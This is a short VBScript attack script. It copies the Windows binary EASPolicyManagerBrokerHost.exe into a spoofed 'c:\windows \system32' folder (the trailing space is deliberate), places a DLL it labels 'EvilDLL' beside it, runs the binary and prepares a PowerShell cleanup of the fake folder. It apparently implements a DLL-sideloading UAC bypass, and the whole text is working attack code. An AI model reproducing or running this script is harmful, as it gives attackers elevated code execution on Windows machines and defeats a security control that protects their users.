Set oFSO = CreateObject("Scripting.FileSystemObject")
Set wshshell = wscript.createobject("WScript.Shell")
' Get target binary and payload
Const strBinary = "EASPolicyManagerBrokerHost.exe"
Const binaryPath = ".\EASPolicyManagerBrokerHost.exe"
Const OriginalDLL = ".\InprocLogger_.dll"
Const EvilDLL = ".\InprocLogger.dll"
Const target = "c:\windows \"
target_sys32 = (target & "system32\")
target_binary = (target_sys32 & strBinary)
If Not oFSO.FolderExists(target) Then oFSO.CreateFolder target End If
If Not oFSO.FolderExists(target_sys32) Then oFSO.CreateFolder target_sys32 End If
' Copy legit binary and evil DLLs
oFSO.CopyFile binaryPath, target_binary
oFSO.CopyFile EvilDLL, target_sys32
oFSO.CopyFile OriginalDLL, target_sys32
wshshell.Run("""" & target_binary & """")
' Deletion using VBScript is problematic, use PowerShell instead
command ="powershell /c ""rm -r """"\\?\" & target & """"""""